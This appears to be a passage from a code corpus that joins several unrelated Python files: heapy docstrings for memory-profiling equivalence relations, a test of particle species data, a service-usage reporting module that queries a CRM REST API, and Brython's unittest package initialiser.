'_parent.Classifiers:tc_repr',
'_parent.Monitor:monitor',
'_parent.Part:_load_stat',
'_parent.Part:Stat',
'_parent.Prof:pb',
'_parent.UniSet:Anything',
'_parent.UniSet:idset',
'_parent.UniSet:iso',
'_parent.UniSet:Nothing',
'_parent.UniSet:union',
'_parent.UniSet:uniset_from_setcastable',
'_parent:View',
'_parent.View:_hiding_tag_',
'_root.time:ctime',
'_root:warnings',
)
_doc_Anything = """Anything: Kind
A symbolic set that represents all possible Python objects.
References
[0] heapy_Use.html#heapykinds.Use.Anything"""
_doc_Class = """Class: EquivalenceRelation
Class(tc:typeorclass+) -> Kind
Equivalence relation by class. It defines objects to be equivalent
when their builtin __class__ attributes are identical. When called it
returns the equivalence class defined by the argument:
tc: A type or class that the returned kind should represent.
References
[0] heapy_Use.html#heapykinds.Use.Class"""
_doc_Clodo = """Clodo: EquivalenceRelation
Clodo(alt:[tc: typeorclassexceptdict+ or dictof =
typeorclassoremptytuple+]) -> Kind
Equivalence relation by class or dict owner. It distinguishes between
objects based on their class just like the Class relation, and in
addition distinguishes between dicts depending on what class they are
'owned' by, i.e. occur in __dict__ attribute of.
When called it returns the equivalence class defined by the argument,
EITHER:
tc: A positional argument, a type or class but not a dict, to
create the corresponding equivalence class.
OR:
dictof: A named argument, to create an equivalence class
consisting of all dicts that are owned by objects of the type
or class specified in the argument; or dicts with no owner if
an empty tuple is given. XXX express this simpler&better...
References
[0] heapy_Use.html#heapykinds.Use.Clodo"""
_doc_Id = """Id: EquivalenceRelation
Id(address: objectaddress+) -> Kind
This equivalence relation defines objects to be equivalent only if
they are identical, i.e. have the same address. When called it returns
the equivalence class defined by the argument:
address: The memory address of an object.
References
[0] heapy_Use.html#heapykinds.Use.Id"""
_doc_Idset = """Idset: EquivalenceRelation
Idset(node: Anything+) -> IdentitySet
This equivalence relation defines objects to be equivalent only if
they are identical, i.e. have the same address. When called it returns
the equivalence class defined by the argument:
node: Anything+
Any object is a valid argument.
Note
This is mainly for special purpose internal use. The Id
equivalence relation is more efficient when partitioning large
sets."""
_doc_Module = """Module:EquivalenceRelation
x.Module( draw:[name = modulename+ , at = moduleaddress+]) -> Kind
This equivalence relation defines objects to be equivalent if they are
the same module, or if none of them is a module. Partitioning a set
of objects using this equivalence relation will therefore result in
one singleton set for each module and one set containing all other
objects.
Calling the Module equivalence relation creates a Kind containing the
module given in the keyword argument(s). Either the name, address or
both may be specified. If no argument is specified the equivalence
class is that of non-module objects.
References
[0] heapy_Use.html#heapykinds.Use.Module"""
_doc_Nothing = """Nothing: IdentitySet
The empty set.
References
[0] heapy_Use.html#heapykinds.Use.Nothing"""
_doc_Rcs = """Rcs: EquivalenceRelation
Rcs ( 0..*: alt:[kind: Kind+ or sok: SetOfKind+]) -> KindOfRetClaSetFamily
(Referrer classification set.)
In this equivalence relation, objects are classified by classifying
their referrers, using the Clodo equivalence relation. These
classifications are collected in a set, representing the
classification of the object.
Calling Rcs creates an equivalence class from a specified set of
referrer classifications. The arguments specify a set of Kind objects,
each of which represents an equivalence class of Clodo.
kind: Kind+
This adds a single Kind to the set of Kinds of referrers.
sok: SetOfKind+
This adds each Kind in the sok argument to the total set of
Kinds of referrers.
References
[0] heapy_Use.html#heapykinds.Use.Rcs"""
_doc_Size = """\
Size: EquivalenceRelation
Size(size: notnegative+) -> KindOfSizeFamily[1]
In this equivalence relation, objects are classified by memory size,
so each equivalence class represents a particular size of object.
References
[0] heapy_Use.html#heapykinds.Use.Size
[1] heapy_UniSet.html#heapykinds.KindOfSizeFamily"""
_doc_Type = """Type: EquivalenceRelation
Type(type: type+) -> KindOfTypeFamily[1]
In this equivalence relation, objects are classified by type so each
equivalence class represents objects of a particular type. Calling it
creates a Kind representing the type specified in the argument:
type: type+
A Python type object or a representation of it.
References
[0] heapy_Use.html#heapykinds.Use.Type
[1] heapy_UniSet.html#heapykinds.KindOfTypeFamily"""
_doc_Unity = """Unity: EquivalenceRelation
Unity() -> Kind[1]
In this equivalence relation, all objects are considered equivalent.
There is only one equivalence class, that is, Anything[2].
References
[0] heapy_Use.html#heapykinds.Use.Unity
[1] heapy_UniSet.html#heapykinds.Kind
[2] heapy_Use.html#heapykinds.Use.Anything"""
_doc_Via = """Via: EquivalenceRelation
Via( 0..*:rel: relationname+) -> KindOfInViaFamily[1]
In this equivalence relation, objects are classified by how they are
referred from their referrers, so each equivalence class represents
objects that have a particular set of relations to their referrers.
Calling it creates a Kind representing the set of referrers specified
by the argument:
rel: relationname+
Each argument specifies one referrer relation. The arguments
should be strings and can be of any of the following forms.
[expression]
Indexing of a dict, list, tuple (etc). The expression must be a
Python expression that can be evaluated in a local
environment. The environment will contain the builtins and a name
'hp' that is bound to the current Use instance.
.attribute
Getting an attribute from a builtin type or a slot of a slotted
type. (I.E. not an attribute that is in a dict of an object.)
.f_locals["name"]
A local variable of a frame.
.f_locals ["name"]
A variable in a CELL of a frame. Note the space between f_locals and
[. This is to distinguish it from ordinary locals, and still use a
syntax that could be used to access those variables directly from
Python.
.keys()[integer]
A key in a dictionary, at the indicated place in its keys().
References
[0] heapy_Use.html#heapykinds.Use.Via
[1] heapy_UniSet.html#heapykinds.KindOfInViaFamily"""
_doc_findex = """
findex( 0..*:kind: Kind+) -> (
Subkind of: EquivalenceRelation[1]
callable: (index: notnegative+)
Calling the returned equivalence relation creates an
equivalence class.
Argument
index: notnegative+
The position of the matching kind in the sequence of
kinds. The first one has index 0. Specifying the
length of the sequence means that the equivalence
class returned is the one where none of the kinds in
the sequence matched.
)
Create an equivalence relation based on a sequence of kinds. The
name is a combination of find and index. The classification of
each object is done as follows:
For each kind in the sequence, check whether the object is an
element of that kind. If it is, the classification is the index
of that kind in the sequence. If the end of the sequence is
reached, the classification is the length of the sequence.
Argument
kind: Kind+
Each argument specifies the kind in that position in the
sequence.
Bugs
Though the Kind objects representing the equivalence classes
work with set operations such as intersection and union, the
tests such as subset and equality do not generally give the
expected result.
References
[0] heapy_Use.html#heapykinds.Use.findex
[1] heapy_UniSet.html#heapykinds.EquivalenceRelation"""
_doc_idset = """idset(nodes: iterable+) -> IdentitySet[1]
Create a set of objects based on identity.
Argument
nodes: iterable+
The argument must be an iterable and may yield any kind
of objects.
Note
This method is the same as iso except for the argument.
References
[0] heapy_Use.html#heapykinds.Use.idset
[1] heapy_UniSet.html#heapykinds.IdentitySet"""
_doc_iso = """iso( 0..*:node: Any+) -> IdentitySet[1]
Create a set of objects based on identity.
Argument
node: Any+
Any kind of objects are valid arguments.
Note
This method is the same as idset[2] except for the argument.
References
[0] heapy_Use.html#heapykinds.Use.iso
[1] heapy_UniSet.html#heapykinds.IdentitySet
[2] heapy_Use.html#heapykinds.Use.idset"""
_doc_sokind = """
"""
|
jbernhard/frzout
|
refs/heads/master
|
frzout/test/test_species.py
|
1
|
# -*- coding: utf-8 -*-
from ..species import species_dict, _nth_digit, _normalize_species
def test_species():
num = 9876543210
assert [_nth_digit(num, n) for n in range(10)] == list(range(10)), \
'Incorrect digits extracted from {}'.format(num)
num = 7492
assert [_nth_digit(num, n) for n in range(5, -1, -1)] == \
[0, 0, 7, 4, 9, 2], \
'Incorrect digits extracted from {}'.format(num)
assert all(i > 100 for i in species_dict), \
'Elementary particles in species data.'
assert len(set(species_dict)) == len(species_dict), \
'Duplicates in species data.'
pion_data = species_dict[211]
assert pion_data['name'] == 'pi', \
'Incorrect pion name.'
assert abs(pion_data['mass'] - .13957061) < 1e-15, \
'Incorrect pion mass.'
assert pion_data['has_anti'], \
'The pi+ has an antiparticle.'
assert pion_data['charge'] == 1, \
'The pi+ has +1 charge.'
assert pion_data['boson'], \
'The pion is a boson.'
assert not species_dict[111]['has_anti'], \
'The pi0 does not have an antiparticle.'
assert species_dict[311]['has_anti'], \
'The K0 has an antiparticle.'
assert not species_dict[2212]['boson'], \
'The proton is a fermion.'
assert 'mass_range' not in species_dict[211], \
'The pion is stable.'
assert 'mass_range' in species_dict[213], \
'The rho is unstable.'
assert abs(species_dict[213]['mass_range'][0] - .28) < 1e-12, \
'The rho mass threshold is two pions.'
assert all(
i['mass_range'][0] >= .28
for i in species_dict.values() if 'mass_range' in i
), 'The lightest decay product is two pions.'
normalized = _normalize_species()
assert len(normalized) == sum(
2 if info['has_anti'] else 1 for info in species_dict.values()
), 'Incorrect number of normalized species.'
assert normalized[0][0] == 111, \
'First normalized species should be the pi0.'
assert normalized[1][0] == -normalized[2][0] == 211, \
'Second and third normalized species should be the pi+/-.'
assert normalized[1][1] is normalized[2][1], \
'pi+/- should share the same info dict.'
normalized_id = _normalize_species('id')
assert [i[0] for i in normalized_id] == [
211, -211, 321, -321, 2212, -2212
], 'Incorrect normalized species IDs.'
test_ID = 2112
test_info = species_dict[test_ID]
assert _normalize_species([test_ID]) == [
(test_ID, test_info),
(-test_ID, test_info)
], 'Incorrect custom normalized species.'
|
eResearchSA/reporting-unified
|
refs/heads/master
|
usage/types.py
|
1
|
import json
import logging
import requests
import concurrent.futures
from urllib.parse import urlencode
from abc import ABCMeta, abstractmethod
from unified.models import nova, hpc
from utils import array_to_dict
logger = logging.getLogger(__name__)
class NotFoundError(Exception):
pass
class Client(object):
"""RESTful APIs' client"""
def __init__(self, url, token=None):
self.end_point = url
self.headers = None
if token:
self.headers = {'x-ersa-auth-token': token}
def group(self, ids, size=10):
"""Slice uuids into managable chunks for optimising request performance"""
return [ids[i:i + size] for i in range(0, len(ids), size)]
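# Illustration (a sketch): chunks preserve order and the last one may be shorter, e.g.
#   group(list(range(7)), size=3) -> [[0, 1, 2], [3, 4, 5], [6]]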
def _verify(self, rst):
"""Check the response for verifying existence"""
if rst.status_code < 300:
return True
else:
logger.error("Request to %s failed. HTTP error code = %d" % (self.end_point, rst.status_code))
return False
def get(self, path='', args={}):
url = self.end_point + path
query_string = urlencode(args)
url = url + '?' + query_string if query_string else url
logger.debug(url)
req = requests.get(url, headers=self.headers)
if self._verify(req):
j = req.json()
logger.debug(j)
return j
return None
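# A usage sketch (the base URL and token are assumptions, not real endpoints):
#   Client('https://api.example.org', token='secret').get('/organisation/', {'method': 'get_tops'})
#   issues GET https://api.example.org/organisation/?method=get_tops with the
#   x-ersa-auth-token header and returns the parsed JSON, or None on HTTP status >= 300.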
class BmanClient(Client):
"""Client of Bman"""
def __init__(self, url, token=None):
super().__init__(url, token)
self.organisations = {} # cache for any organisation(account) name
self.top_orgs = [org['id'] for org in self.get('/organisation/', {'method': 'get_tops'})]
def get_parent_org_ids(self, role_id):
"""Gets the organisation names of a role"""
# FIXME: Bman for MS Dynamics does not support this feature 20170428
# A role only has the lowest organisation; for grouping it needs
# to be expanded into a full list.
# There can be more than one parent at the same level.
orgs = []
role = self.get('/role/%d/' % role_id)
if role:
parent_org_ids = self.get('/organisation/%d/get_parent_ids/' % role['organisation'])
if parent_org_ids:
orgs = parent_org_ids
orgs.append(role['organisation'])
else:
orgs = [role['organisation']]
return orgs
def get_org_name(self, org_id):
# TODO: Bman for MS Dynamics does not support this query yet 20170428
name = ''
if org_id in self.organisations:
name = self.organisations[org_id]
else:
org = self.get('/organisation/%d/' % org_id)
if org:
name = self.organisations[org_id] = org['name']
return name
def get_org_names(self, org_ids):
names = []
for org_id in org_ids:
names.append(self.get_org_name(org_id))
return names
def get_managing_org_names(self, role_id, billing_org_id=None):
"""
Gets names of managing organisations of a role
As a service can be billed differently from the associated organisation,
use billing_org_id to make sure that, for billing purposes, the managing
organisations are correct.
"""
# FIXME: This may not be needed for Dynamics as there is no need to get managing org by manager role as for Bman
names = []
parent_org_ids = self.get_parent_org_ids(role_id)
if parent_org_ids:
top_count = sum([1 for org_id in parent_org_ids if org_id in self.top_orgs])
if billing_org_id:
names = [self.get_org_name(billing_org_id)]
if top_count == 1 and billing_org_id in parent_org_ids:
# valid fully expanded organisation chain
names = self.get_org_names(parent_org_ids)
else:
# this could be less accurate as there may be more than one top organisation
names = self.get_org_names(parent_org_ids)
return names
class Usage(metaclass=ABCMeta):
"""Abstract class of calculating usage of a service in a time period"""
# Derived classes cross-reference BMAN for classifiers:
# university and school. If none of them is found, the manager field
# is an empty list.
def __init__(self, start, end, **kwargs):
# conditions are used to define how to prepare data
# source, model.
# Derived classes may have their own set up conditions:
# usage model, prices(?), etc
self.start_timestamp = start
self.end_timestamp = end
logger.debug("Query arguments: start=%s, end=%s" % (self.start_timestamp, self.end_timestamp))
# usage_meta is a dict keyed by the values of the usage data's identifier:
# for NECTAR it is OpenstackID; for HPC it is owner
self.usage_meta = None
@abstractmethod
def prepare(self):
"""Gets data from source, do other preparations
It should returns manager_field
"""
pass
def _get_managing_orgs_of(self, identifier, unit_name='managerunit'):
"""Override parent class method as the usage meta is not from Orders"""
managing_orgs = []
if identifier in self.usage_meta:
managing_orgs = [self.usage_meta[identifier]['biller']]
if unit_name in self.usage_meta[identifier]:
managing_orgs.append(self.usage_meta[identifier][unit_name])
return managing_orgs
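# Illustration with made-up data (not from the source):
#   with self.usage_meta == {'u1': {'biller': 'Uni A', 'managerunit': 'School B'}}
#   _get_managing_orgs_of('u1') returns ['Uni A', 'School B'];
#   an unknown identifier returns [].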
def _get_managing_orgs(self, identifiers):
"""Gets names of managing organisation of identifiers.
identifiers: a list with unique values which will be used by checker
getter: a function to get the names
"""
managers = {}
for ident in identifiers:
try:
managers[ident] = self._get_managing_orgs_of(ident)
except NotFoundError:
logger.warning('Cannot retrieve organisation information for identifier %s' % ident)
managers[ident] = []
except Exception:
managers[ident] = []
logger.exception('Cannot retrieve organisation information for identifier %s' % ident)
return managers
def save(self, data):
"""Saves data into a JSON file named as ServiceUsage_StartTimestamp_EndTimestamp.json"""
file_name = '%s_%d_%d.json' % (self.__class__.__name__, self.start_timestamp, self.end_timestamp)
with open(file_name, 'w') as jf:
json.dump(data, jf)
return file_name
def calculate(self):
# Get data by calling prepare and inserting manager field with managing organisations
items, manager_field = self.prepare()
logger.debug('%d items have been returned by prepare. manager_field is %s' % (len(items), manager_field))
# managers is short for managing organisations: always biller and managerunit (school)
# person manager is not included as of 20170428.
managers = self._get_managing_orgs(set(item[manager_field] for item in items))
for item in items:
item['manager'] = managers[item[manager_field]]
return self.save(items)
class NovaUsage(Usage):
"""Calculates Nova usage (states) in a time period."""
def __init__(self, start, end, crm_client, workers=1):
super().__init__(start, end)
self.crm_client = crm_client
# usage_meta is a dict which has OpenstackID as key and all other information of a product (Nectar allocation) as value
self.usage_meta = array_to_dict(self.crm_client.get('/v2/contract/nectarcloudvm/'), 'OpenstackID')
self.concurrent_workers = workers
def _get_state(self, instance_id):
instance = nova.Instance.query.get(instance_id)
return instance.latest_state(self.start_timestamp, self.end_timestamp)
def prepare(self):
q = nova.Summary(self.start_timestamp, self.end_timestamp)
ids = q.value()
logger.debug("Total number of instances = %d" % len(ids))
if len(ids):
with concurrent.futures.ThreadPoolExecutor(max_workers=self.concurrent_workers) as executor:
fs = {executor.submit(self._get_state, instance_id):
instance_id for instance_id in ids}
return [fu.result() for fu in concurrent.futures.as_completed(fs)], 'tenant'
else:
return [], 'tenant'
class HpcUsage(Usage):
"""Calculates HPC Usage in a time period."""
def __init__(self, start, end, crm_client):
super().__init__(start, end)
self.crm_client = crm_client
self.usage_meta = array_to_dict(self.crm_client.get('/access/'), 'username')
def _get_managing_orgs_of(self, identifier):
"""Override parent method as the usage meta is not from Orders,
therefore there is no managerunit; unit is used as the secondary instead
"""
return super()._get_managing_orgs_of(identifier, 'unit')
def prepare(self):
return hpc.Job.list(self.start_timestamp, self.end_timestamp), 'owner'
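# Example driver (a sketch; the Bman URL, token and timestamps are assumptions):
#   crm = BmanClient('https://bman.example.org/api', token='secret')
#   usage = HpcUsage(1488326400, 1490918400, crm)
#   report_file = usage.calculate()   # writes HpcUsage_1488326400_1490918400.json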
|
40223110/2015cda_0512
|
refs/heads/master
|
static/Brython3.1.0-20150301-090019/Lib/unittest/__init__.py
|
900
|
"""
Python unit testing framework, based on Erich Gamma's JUnit and Kent Beck's
Smalltalk testing framework.
This module contains the core framework classes that form the basis of
specific test cases and suites (TestCase, TestSuite etc.), and also a
text-based utility class for running the tests and reporting the results
(TextTestRunner).
Simple usage:
import unittest
class IntegerArithmeticTestCase(unittest.TestCase):
def testAdd(self): ## test method names begin 'test*'
self.assertEqual((1 + 2), 3)
self.assertEqual(0 + 1, 1)
def testMultiply(self):
self.assertEqual((0 * 10), 0)
self.assertEqual((5 * 8), 40)
if __name__ == '__main__':
unittest.main()
Further information is available in the bundled documentation, and from
http://docs.python.org/library/unittest.html
Copyright (c) 1999-2003 Steve Purcell
Copyright (c) 2003-2010 Python Software Foundation
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__all__ = ['TestResult', 'TestCase', 'TestSuite',
'TextTestRunner', 'TestLoader', 'FunctionTestCase', 'main',
'defaultTestLoader', 'SkipTest', 'skip', 'skipIf', 'skipUnless',
'expectedFailure', 'TextTestResult', 'installHandler',
'registerResult', 'removeResult', 'removeHandler']
# Expose obsolete functions for backwards compatibility
__all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases'])
__unittest = True
from .result import TestResult
from .case import (TestCase, FunctionTestCase, SkipTest, skip, skipIf,
skipUnless, expectedFailure)
from .suite import BaseTestSuite, TestSuite
from .loader import (TestLoader, defaultTestLoader, makeSuite, getTestCaseNames,
findTestCases)
from .main import TestProgram, main
from .runner import TextTestRunner, TextTestResult
from .signals import installHandler, registerResult, removeResult, removeHandler
# deprecated
_TextTestResult = TextTestResult
|